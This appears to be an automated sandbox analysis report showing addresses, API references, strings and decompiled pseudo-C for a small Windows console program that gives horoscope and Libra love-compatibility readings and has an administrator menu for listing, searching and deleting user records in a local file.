                                                                          0x013d5a6d
                                                                          0x013d5a70
                                                                          0x013d5a77
                                                                          0x013d5a7e
                                                                          0x013d5a8a
                                                                          0x013d5a8b
                                                                          0x013d5a8b
                                                                          0x013d5a94
                                                                          0x00000000
                                                                          0x013d5a94
                                                                          0x00000000

                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D531D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D5335
                                                                          • _wprintf.LIBCMT ref: 013D5357
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D5379
                                                                          • _wprintf.LIBCMT ref: 013D538D
                                                                          • _wprintf.LIBCMT ref: 013D53A1
                                                                          • _wprintf.LIBCMT ref: 013D53B5
                                                                          • _wprintf.LIBCMT ref: 013D53C9
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D540C
                                                                          • _wprintf.LIBCMT ref: 013D5431
                                                                          • _wprintf.LIBCMT ref: 013D54A1
                                                                          • _wprintf.LIBCMT ref: 013D54AB
                                                                          • _wprintf.LIBCMT ref: 013D54D6
                                                                          • _wprintf.LIBCMT ref: 013D54E0
                                                                          • __wsystem.LIBCMT ref: 013D54F7
                                                                          • __wsystem.LIBCMT ref: 013D551F
                                                                          • _wprintf.LIBCMT ref: 013D5544
                                                                          • _wprintf.LIBCMT ref: 013D5558
                                                                          • _wprintf.LIBCMT ref: 013D5576
                                                                          • _wprintf.LIBCMT ref: 013D5584
                                                                          • _wprintf.LIBCMT ref: 013D55A7
                                                                          • _wprintf.LIBCMT ref: 013D55CA
                                                                          • _wprintf.LIBCMT ref: 013D55DE
                                                                          • __wsystem.LIBCMT ref: 013D55F5
                                                                          • __wsystem.LIBCMT ref: 013D59CD
                                                                          • _wprintf.LIBCMT ref: 013D59E2
                                                                          • _wprintf.LIBCMT ref: 013D59FA
                                                                          • _wprintf.LIBCMT ref: 013D5A18
                                                                          • _wprintf.LIBCMT ref: 013D5A2C
                                                                          • _wprintf.LIBCMT ref: 013D5A40
                                                                          • _wprintf.LIBCMT ref: 013D5A54
                                                                          • _wprintf.LIBCMT ref: 013D5A68
                                                                          • _wprintf.LIBCMT ref: 013D5A9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$------------------------------------------------------------------$0$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$LIBRA AND AQUARIUS LOVE COMPATIBILITY$LIBRA AND ARIES LOVE COMPATIBILITY$LIBRA AND CANCER LOVE COMPATIBILITY$LIBRA AND CAPRICORN LOVE COMPATIBILITY$LIBRA AND GEMINI LOVE COMPATIBILITY$LIBRA AND LEO LOVE COMPATIBILITY$LIBRA AND LIBRA LOVE COMPATIBILITY$LIBRA AND PISCES LOVE COMPATIBILITY$LIBRA AND SAGGITARIUS LOVE COMPATIBILITY$LIBRA AND SCORPIO LOVE COMPATIBILITY$LIBRA AND TAURUS LOVE COMPATIBILITY$LIBRA AND VIRGO LOVE COMPATIBILITY$Name: %s$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$Your horoscope sign is Libra-The Balance$___.' '.___$____________$cls$gfff$gfff
                                                                          • API String ID: 2876428006-1026757386
                                                                          • Opcode ID: 50fa2fa118110c947a050ece919597e689d9bcf2956674be87db6c51101e9514
                                                                          • Instruction ID: b403fb2327d6c8a74418efdf2c34bf642471457aa7a193577ddbc7777ef2a2b1
                                                                          • Opcode Fuzzy Hash: 50fa2fa118110c947a050ece919597e689d9bcf2956674be87db6c51101e9514
                                                                          • Instruction Fuzzy Hash: 02F1B0B360024AABD700BFEEBC45E6F7B7DABA679CF01451CF15466208DB7058158BB2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1E40, Relevance: 156.2, APIs: 59, Strings: 30, Instructions: 423COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 70%
                                                                          			E013D1E40(signed short __edi) {
				char _v8;
				char _v60;
				void* __ebx;
				signed int __esi;
				void* __ebp;
				void* _t21;
				signed int _t34;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t61;
				signed short _t66;
				signed int _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;

				_t66 = __edi;
				E013DB418(_t55, _t61, _t74, "cls");
				_v8 = 0;
				_t56 = E013DBB6E("records.txt", "rb");
				_t68 = 1;
				_t21 = E013DBDCF(0x13fe1d0, 0x40, 1, _t56);
				_t70 = _t69 + 0x1c;
				if(_t21 == 1) {
					do {
						_v8 = _v8 + 1;
						_t54 = E013DBDCF(0x13fe1d0, 0x40, 1, _t56);
						_t70 = _t70 + 0x10;
						_t76 = _t54 - 1;
					} while (_t54 == 1);
				}
				_t62 = _v8;
				_push(_v8);
				_push("NO OF USERS=%d");
				 *0x13fe250 = 0x32;
				 *0x13fe252 = _t68;
				E013DB9F5(_t56, _v8, _t66, _t68, _t76);
				_push("ADMINISTRATOR TOOLS:");
				 *0x13fe250 = 0x50005;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				_push("----------------------------------------------------------------------");
				 *0x13fe250 = 0x60005;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				_push("1.SEE USER\'S DIRECTORY");
				 *0x13fe250 = 0x8000a;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				_push("2.SEARCH BIRTHDAYS");
				 *0x13fe250 = 0xa000a;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				_push("3.DELETE USER RECORD");
				 *0x13fe250 = 0xc000a;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				_push("4.RETURN TO MAIN PROGRAM");
				 *0x13fe250 = 0xe000a;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				_push("----------------------------------------------------------------------");
				 *0x13fe250 = 0x6000a;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				_push("Enter your choice");
				 *0x13fe250 = 0x11000f;
				E013DB9F5(_t56, _t62, _t66, _t68, _t76);
				E013DB060("%d",  &_v8);
				_t34 = _v8 - 1;
				_t71 = _t70 + 0x30;
				if(_t34 <= 3) {
					_push(_t66);
					switch( *((intOrPtr*)(_t34 * 4 +  &M013D2534))) {
						case 0:
							E013DB418(_t56, _t62, _t77, "cls");
							_push(_t56);
							E013DAF25(_t56, _t66, _t68, _t77);
							_t63 = 0xa;
							_push("ADMINISTRATOR TOOLS");
							 *0x13fe250 = 0xa;
							 *0x13fe252 = _t68;
							E013DB9F5(_t56, 0xa, _t66, _t68, _t77);
							_push("NAME");
							 *0x13fe250 = 0x50003;
							E013DB9F5(_t56, _t63, _t66, _t68, _t77);
							_push("SEX\tAGE\tDATE OF BIRTH");
							 *0x13fe250 = 0x5001e;
							E013DB9F5(_t56, _t63, _t66, _t68, _t77);
							_push("Following Users Have Used Our Program:");
							 *0x13fe250 = 0x20003;
							E013DB9F5(_t56, _t63, _t66, _t68, _t77);
							_push("-------------------------------------------------------------");
							 *0x13fe250 = 0x30003;
							E013DB9F5(_t56, _t63, _t66, _t68, _t77);
							_t43 = E013DBDCF(0x13fe1d0, 0x40, _t68, _t56);
							_t72 = _t71 + 0x2c;
							_t78 = _t43 - _t68;
							if(_t43 != _t68) {
								goto L39;
							}
							do {
								_push(0x13fe1d0);
								_push(_t68);
								_t9 = _t68 + 5; // 0x6
								_t66 = _t9;
								_push("%d  %s");
								 *0x13fe250 = 3;
								 *0x13fe252 = _t66;
								E013DB9F5(_t56, _t63, _t66, _t68, _t78);
								_t50 =  *0x13fe204;
								_push(_t50);
								_push( *0x13fe208);
								 *0x13fe250 = 0x1e;
								_push( *0x13fe20c);
								_t63 = 0x7da - _t50;
								_push(0x7da);
								_push( *0x13fe202);
								_push("%c  \t%d  \t%d/%d/%d\n");
								 *0x13fe252 = _t66;
								E013DB9F5(_t56, 0x7da - _t50, _t66, _t68, _t78);
								_t68 = _t68 + 1;
								_t53 = E013DBDCF(0x13fe1d0, 0x40, 1, _t56);
								_t72 = _t72 + 0x34;
								_t79 = _t53 - 1;
							} while (_t53 == 1);
							goto L39;
						case 1:
							__eax = E013DB418(__ebx, __edx, __eflags, "cls");
							_push("THIS IS VOODOO SEARCH ENGINE. ENTER THE NAME YOU WANT TO SEARCH:");
							__edi = 9;
							 *0x13fe250 = 0x20003;
							__eax = E013DB9F5(__ebx, __edx, 9, __esi, __eflags);
							_push("NAME=");
							 *0x13fe250 = 0x40003;
							__eax = E013DB9F5(__ebx, __edx, 9, __esi, __eflags);
							_push(E013DB07D());
							__eax = E013DB3BC(__ebx, __edx, 9, __esi, __eflags);
							_push("Following results found:");
							 *0x13fe250 = 0x60003;
							__eax = E013DB9F5(__ebx, __edx, 9, __esi, __eflags);
							_push("----------------------------------------------------------------");
							 *0x13fe250 = 0x70003;
							__eax = E013DB9F5(__ebx, __edx, 9, __esi, __eflags);
							_push("NAME");
							_t10 = __edi - 1; // 0x8
							__ecx = _t10;
							 *0x13fe250 = 0x80003;
							__eax = E013DB9F5(__ebx, __edx, 9, __esi, __eflags);
							_push("SEX\tAGE\tDATE OF BIRTH");
							 *0x13fe250 = 0x8001e;
							__eax = E013DB9F5(__ebx, __edx, 9, __esi, __eflags);
							_push(__ebx);
							__eax = E013DAF25(__ebx, 9, __esi, __eflags);
							__eflags = E013DBDCF(0x13fe1d0, 0x40, 1, __ebx) - 1;
							if(__eflags != 0) {
								L21:
								_push("(Sorry,There are no results to display)");
								 *0x13fe250 = 0xc0006;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								L22:
								_push("\n\n\n\nEnter any key to continue....");
								goto L40;
							}
							do {
								__esi = 0x13fe1d0;
								__eax =  &_v60;
								while(1) {
									__cl =  *__eax;
									__eflags = __cl -  *__esi;
									if(__cl !=  *__esi) {
										break;
									}
									__eflags = __cl;
									if(__cl == 0) {
										L15:
										__eax = 0;
										goto L17;
									}
									__cl =  *((intOrPtr*)(__eax + 1));
									__eflags = __cl -  *(__esi + 1);
									if(__cl !=  *(__esi + 1)) {
										break;
									}
									__eax = __eax + 2;
									__esi = __esi + 2;
									__eflags = __cl;
									if(__cl != 0) {
										continue;
									}
									goto L15;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								L17:
								__eflags = __eax;
								if(__eflags == 0) {
									_push(0x13fe1d0);
									_t14 = __edi - 8; // 0x1
									__edx = _t14;
									__esi = __di & 0x0000ffff;
									_push(__edx);
									__ecx = 3;
									_push("%d  %s");
									 *0x13fe250 = __cx;
									 *0x13fe252 = __si;
									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
									__ecx =  *0x13fe208;
									__edx =  *0x13fe20c;
									__esp = __esp + 0xc;
									__eax = 0x1e;
									 *0x13fe250 = __ax;
									__eax =  *0x13fe204;
									_push(__eax);
									_push( *0x13fe208);
									_push( *0x13fe20c);
									__edx =  *0x13fe202;
									0x7da = 0x7da - __eax;
									_push(0x7da - __eax);
									 *0x13fe252 = __si;
									_push(E013DC111(__edx));
									_push("%c  \t%d  \t%d/%d/%d\n");
									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__edi = __edi + 1;
									__eflags = __edi;
								}
								__eax = E013DBDCF(0x13fe1d0, 0x40, 1, __ebx);
								__eflags = __eax - 1;
							} while (__eax == 1);
							__eflags = __edi - 9;
							if(__eflags != 0) {
								goto L22;
							}
							goto L21;
						case 2:
							__eax = E013DB418(__ebx, __edx, __eflags, "cls");
							_push(__ebx);
							__eax = E013DAF25(__ebx, __edi, __esi, __eflags);
							_push(__ebx);
							__eax = E013DC1FB(__ebx, __edx, __edi, __esi, __eflags);
							__esi = E013DBB6E("records.txt", "rb+");
							__eax = E013DBB6E("temp.txt", "wb");
							_push("ADMINISTRATOR TOOLS");
							__edi = __eax;
							 *0x13fe250 = 0x1000a;
							__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
							_push("----------------------------------------------------------------");
							 *0x13fe250 = 0x20003;
							__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
							_push(" ENTER THE NAME YOU WANT TO DELETE:");
							 *0x13fe250 = 0x30003;
							__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
							_push("NAME=");
							__edx = 3;
							 *0x13fe250 = 0x40003;
							__eax = E013DB9F5(__ebx, 3, __edi, __esi, __eflags);
							_push(E013DB07D());
							__eax = E013DB3BC(__ebx, 3, __edi, __esi, __eflags);
							__eflags = E013DBDCF(0x13fe1d0, 0x40, 1, __esi) - 1;
							if(__eflags != 0) {
								L35:
								_push(__edi);
								__eax = E013DC1FB(__ebx, __edx, __edi, __esi, __eflags);
								_push(__esi);
								E013DC1FB(__ebx, __edx, __edi, __esi, __eflags) = E013DB4F5("records.txt");
								E013DB418(__ebx, __edx, __eflags, "copy temp.txt records.txt") = E013DB4F5("temp.txt");
								_push("Please wait while the system rearranges the data.");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push(".");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push(".");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push(".");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push("Entry successfully deleted...do you wish to see the new data?(Y/N)");
								 *0x13fe250 = 0xa0003;
								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = E013EDC3B(__ebx, __edx, __edi, __esi, __eflags);
								__eax = E013DC111(__eax);
								__eflags = __al - 0x59;
								if(__eflags != 0) {
									L41:
									_t47 = E013D1E40(_t66);
									goto L42;
								}
								__esi = 1;
								__ebx = E013DBB6E("records.txt", "rb");
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								_push("ADMINISTRATOR TOOLS");
								 *0x13fe250 = 0x1000a;
								__eax = E013DB9F5(__ebx, __edx, __edi, 1, __eflags);
								_push("NAME");
								 *0x13fe250 = 0x50003;
								__eax = E013DB9F5(__ebx, __edx, __edi, 1, __eflags);
								_push("SEX\tAGE\tDATE OF BIRTH");
								 *0x13fe250 = 0x5001e;
								__eax = E013DB9F5(__ebx, __edx, __edi, 1, __eflags);
								_push("Following Users Have Used Our Program:");
								 *0x13fe250 = 0x20003;
								__eax = E013DB9F5(__ebx, __edx, __edi, 1, __eflags);
								_push("-------------------------------------------------------------");
								 *0x13fe250 = 0x30003;
								__eax = E013DB9F5(__ebx, __edx, __edi, 1, __eflags);
								__eflags = E013DBDCF(0x13fe1d0, 0x40, 1, __ebx) - 1;
								if(__eflags != 0) {
									L39:
									_push("\n\n\n\n\nEnter any key to continue....");
									L40:
									E013DB9F5(_t56, _t63, _t66, _t68, _t79);
									E013EDBFD(_t56, _t66, _t68, _t79);
									_push(_t56);
									E013DC1FB(_t56, _t63, _t66, _t68, _t79);
									goto L41;
								}
								do {
									_push(0x13fe1d0);
									__eax = 3;
									_push(__esi);
									_t18 = __esi + 5; // 0x6
									__edi = _t18;
									_push("%d  %s");
									 *0x13fe250 = __ax;
									 *0x13fe252 = __di;
									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
									__eax =  *0x13fe204;
									__edx =  *0x13fe208;
									__esp = __esp + 0xc;
									_push(__eax);
									_push( *0x13fe208);
									__ecx = 0x1e;
									 *0x13fe250 = __cx;
									__ecx =  *0x13fe20c;
									__edx = 0x7da;
									__edx = 0x7da - __eax;
									__eax =  *0x13fe202;
									_push( *0x13fe20c);
									_push(0x7da);
									 *0x13fe252 = __di;
									_push(E013DC111( *0x13fe202));
									_push("%c  \t%d  \t%d/%d/%d\n");
									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
									__esi = __esi + 1;
									__eflags = E013DBDCF(0x13fe1d0, 0x40, 1, __ebx) - 1;
								} while (__eflags == 0);
								goto L39;
							}
							do {
								__ecx =  &_v60;
								__eax = 0x13fe1d0;
								while(1) {
									__dl =  *__eax;
									__eflags = __dl -  *__ecx;
									if(__dl !=  *__ecx) {
										break;
									}
									__eflags = __dl;
									if(__dl == 0) {
										L30:
										__eax = 0;
										goto L32;
									}
									__dl =  *((intOrPtr*)(__eax + 1));
									__eflags = __dl -  *((intOrPtr*)(__ecx + 1));
									if(__dl !=  *((intOrPtr*)(__ecx + 1))) {
										break;
									}
									__eax = __eax + 2;
									__ecx = __ecx + 2;
									__eflags = __dl;
									if(__dl != 0) {
										continue;
									}
									goto L30;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								L32:
								__eflags = __eax;
								if(__eflags != 0) {
									_push(__edi);
									_push(1);
									_push(0x40);
									_push(0x13fe1d0);
									__eax = E013DBF81(__ebx, __edx, __edi, __esi, __eflags);
									__esp = __esp + 0x10;
								}
								__eflags = E013DBDCF(0x13fe1d0, 0x40, 1, __esi) - 1;
							} while (__eflags == 0);
							goto L35;
						case 3:
							L42:
							return _t47;
					}
				}
				return _t34;
			}




















                                                                          0x013d1e40
                                                                          0x013d1e4d
                                                                          0x013d1e5c
                                                                          0x013d1e68
                                                                          0x013d1e6b
                                                                          0x013d1e78
                                                                          0x013d1e7d
                                                                          0x013d1e82
                                                                          0x013d1e84
                                                                          0x013d1e84
                                                                          0x013d1e90
                                                                          0x013d1e95
                                                                          0x013d1e98
                                                                          0x013d1e98
                                                                          0x013d1e84
                                                                          0x013d1e9c
                                                                          0x013d1e9f
                                                                          0x013d1ea7
                                                                          0x013d1eac
                                                                          0x013d1eb2
                                                                          0x013d1eb9
                                                                          0x013d1ebe
                                                                          0x013d1ec3
                                                                          0x013d1ecd
                                                                          0x013d1ed2
                                                                          0x013d1ed7
                                                                          0x013d1ee1
                                                                          0x013d1ee6
                                                                          0x013d1eeb
                                                                          0x013d1ef5
                                                                          0x013d1efa
                                                                          0x013d1eff
                                                                          0x013d1f09
                                                                          0x013d1f0e
                                                                          0x013d1f13
                                                                          0x013d1f1d
                                                                          0x013d1f22
                                                                          0x013d1f27
                                                                          0x013d1f31
                                                                          0x013d1f36
                                                                          0x013d1f3b
                                                                          0x013d1f45
                                                                          0x013d1f4a
                                                                          0x013d1f4f
                                                                          0x013d1f59
                                                                          0x013d1f67
                                                                          0x013d1f6f
                                                                          0x013d1f70
                                                                          0x013d1f76
                                                                          0x013d1f7c
                                                                          0x013d1f7d
                                                                          0x00000000
                                                                          0x013d1f89
                                                                          0x013d1f8e
                                                                          0x013d1f8f
                                                                          0x013d1f94
                                                                          0x013d1f9b
                                                                          0x013d1fa0
                                                                          0x013d1fa7
                                                                          0x013d1fad
                                                                          0x013d1fb2
                                                                          0x013d1fb7
                                                                          0x013d1fc1
                                                                          0x013d1fc6
                                                                          0x013d1fcb
                                                                          0x013d1fd5
                                                                          0x013d1fda
                                                                          0x013d1fdf
                                                                          0x013d1fe9
                                                                          0x013d1fee
                                                                          0x013d1ff3
                                                                          0x013d1ffd
                                                                          0x013d200b
                                                                          0x013d2010
                                                                          0x013d2013
                                                                          0x013d2015
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d2020
                                                                          0x013d2020
                                                                          0x013d202a
                                                                          0x013d202b
                                                                          0x013d202b
                                                                          0x013d202e
                                                                          0x013d2033
                                                                          0x013d2039
                                                                          0x013d2040
                                                                          0x013d2045
                                                                          0x013d2050
                                                                          0x013d2051
                                                                          0x013d2057
                                                                          0x013d2064
                                                                          0x013d206a
                                                                          0x013d2073
                                                                          0x013d2074
                                                                          0x013d2075
                                                                          0x013d207a
                                                                          0x013d2081
                                                                          0x013d2090
                                                                          0x013d2091
                                                                          0x013d2096
                                                                          0x013d2099
                                                                          0x013d2099
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d20a8
                                                                          0x013d20ad
                                                                          0x013d20b2
                                                                          0x013d20b7
                                                                          0x013d20c1
                                                                          0x013d20c6
                                                                          0x013d20cb
                                                                          0x013d20d5
                                                                          0x013d20df
                                                                          0x013d20e0
                                                                          0x013d20e5
                                                                          0x013d20ea
                                                                          0x013d20f4
                                                                          0x013d20f9
                                                                          0x013d20fe
                                                                          0x013d2108
                                                                          0x013d210d
                                                                          0x013d2112
                                                                          0x013d2112
                                                                          0x013d2115
                                                                          0x013d211f
                                                                          0x013d2124
                                                                          0x013d2129
                                                                          0x013d2133
                                                                          0x013d2138
                                                                          0x013d2139
                                                                          0x013d2150
                                                                          0x013d2153
                                                                          0x013d222a
                                                                          0x013d222a
                                                                          0x013d222f
                                                                          0x013d2239
                                                                          0x013d223e
                                                                          0x013d2241
                                                                          0x013d2241
                                                                          0x00000000
                                                                          0x013d2241
                                                                          0x013d2160
                                                                          0x013d2160
                                                                          0x013d2165
                                                                          0x013d2168
                                                                          0x013d2168
                                                                          0x013d216a
                                                                          0x013d216c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d216e
                                                                          0x013d2170
                                                                          0x013d2184
                                                                          0x013d2184
                                                                          0x00000000
                                                                          0x013d2184
                                                                          0x013d2172
                                                                          0x013d2175
                                                                          0x013d2178
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d217a
                                                                          0x013d217d
                                                                          0x013d2180
                                                                          0x013d2182
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d2182
                                                                          0x013d2188
                                                                          0x013d218a
                                                                          0x013d218d
                                                                          0x013d218d
                                                                          0x013d218f
                                                                          0x013d2191
                                                                          0x013d2196
                                                                          0x013d2196
                                                                          0x013d2199
                                                                          0x013d219c
                                                                          0x013d219d
                                                                          0x013d21a2
                                                                          0x013d21a7
                                                                          0x013d21ae
                                                                          0x013d21b5
                                                                          0x013d21ba
                                                                          0x013d21c0
                                                                          0x013d21c6
                                                                          0x013d21c9
                                                                          0x013d21ce
                                                                          0x013d21d4
                                                                          0x013d21d9
                                                                          0x013d21da
                                                                          0x013d21db
                                                                          0x013d21dc
                                                                          0x013d21e8
                                                                          0x013d21ea
                                                                          0x013d21ec
                                                                          0x013d21fb
                                                                          0x013d21fc
                                                                          0x013d2201
                                                                          0x013d2206
                                                                          0x013d2209
                                                                          0x013d2209
                                                                          0x013d2209
                                                                          0x013d2214
                                                                          0x013d221c
                                                                          0x013d221c
                                                                          0x013d2225
                                                                          0x013d2228
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d2250
                                                                          0x013d2255
                                                                          0x013d2256
                                                                          0x013d225b
                                                                          0x013d225c
                                                                          0x013d227a
                                                                          0x013d227c
                                                                          0x013d2281
                                                                          0x013d2286
                                                                          0x013d2288
                                                                          0x013d2292
                                                                          0x013d2297
                                                                          0x013d229c
                                                                          0x013d22a6
                                                                          0x013d22ab
                                                                          0x013d22b0
                                                                          0x013d22ba
                                                                          0x013d22bf
                                                                          0x013d22c4
                                                                          0x013d22c9
                                                                          0x013d22d3
                                                                          0x013d22dd
                                                                          0x013d22de
                                                                          0x013d22f5
                                                                          0x013d22f8
                                                                          0x013d235a
                                                                          0x013d235a
                                                                          0x013d235b
                                                                          0x013d2360
                                                                          0x013d236b
                                                                          0x013d237f
                                                                          0x013d2384
                                                                          0x013d2389
                                                                          0x013d2393
                                                                          0x013d2398
                                                                          0x013d239d
                                                                          0x013d23a2
                                                                          0x013d23a7
                                                                          0x013d23ac
                                                                          0x013d23b1
                                                                          0x013d23b6
                                                                          0x013d23bb
                                                                          0x013d23ca
                                                                          0x013d23d0
                                                                          0x013d23d8
                                                                          0x013d23da
                                                                          0x013d2526
                                                                          0x013d2526
                                                                          0x00000000
                                                                          0x013d2526
                                                                          0x013d23ea
                                                                          0x013d23f9
                                                                          0x013d23fb
                                                                          0x013d2400
                                                                          0x013d2405
                                                                          0x013d240f
                                                                          0x013d2414
                                                                          0x013d2419
                                                                          0x013d2423
                                                                          0x013d2428
                                                                          0x013d242d
                                                                          0x013d2437
                                                                          0x013d243c
                                                                          0x013d2441
                                                                          0x013d244b
                                                                          0x013d2450
                                                                          0x013d2455
                                                                          0x013d245f
                                                                          0x013d2475
                                                                          0x013d2477
                                                                          0x013d250e
                                                                          0x013d250e
                                                                          0x013d2513
                                                                          0x013d2513
                                                                          0x013d2518
                                                                          0x013d251d
                                                                          0x013d251e
                                                                          0x00000000
                                                                          0x013d2523
                                                                          0x013d2480
                                                                          0x013d2480
                                                                          0x013d2485
                                                                          0x013d248a
                                                                          0x013d248b
                                                                          0x013d248b
                                                                          0x013d248e
                                                                          0x013d2493
                                                                          0x013d2499
                                                                          0x013d24a0
                                                                          0x013d24a5
                                                                          0x013d24aa
                                                                          0x013d24b0
                                                                          0x013d24b3
                                                                          0x013d24b4
                                                                          0x013d24b5
                                                                          0x013d24ba
                                                                          0x013d24c1
                                                                          0x013d24c7
                                                                          0x013d24cc
                                                                          0x013d24ce
                                                                          0x013d24d5
                                                                          0x013d24d6
                                                                          0x013d24d8
                                                                          0x013d24e7
                                                                          0x013d24e8
                                                                          0x013d24ed
                                                                          0x013d24fc
                                                                          0x013d2505
                                                                          0x013d2505
                                                                          0x00000000
                                                                          0x013d2480
                                                                          0x013d2300
                                                                          0x013d2300
                                                                          0x013d2303
                                                                          0x013d2308
                                                                          0x013d2308
                                                                          0x013d230a
                                                                          0x013d230c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d230e
                                                                          0x013d2310
                                                                          0x013d2324
                                                                          0x013d2324
                                                                          0x00000000
                                                                          0x013d2324
                                                                          0x013d2312
                                                                          0x013d2315
                                                                          0x013d2318
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d231a
                                                                          0x013d231d
                                                                          0x013d2320
                                                                          0x013d2322
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d2322
                                                                          0x013d2328
                                                                          0x013d232a
                                                                          0x013d232d
                                                                          0x013d232d
                                                                          0x013d232f
                                                                          0x013d2331
                                                                          0x013d2332
                                                                          0x013d2334
                                                                          0x013d2336
                                                                          0x013d233b
                                                                          0x013d2340
                                                                          0x013d2340
                                                                          0x013d2355
                                                                          0x013d2355
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d252b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d1f7d
                                                                          0x013d2531

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__fread_nolock$__wsystem$__fsopen__invoke_watson__waccess_s__wdupenv_s_free_wscanf
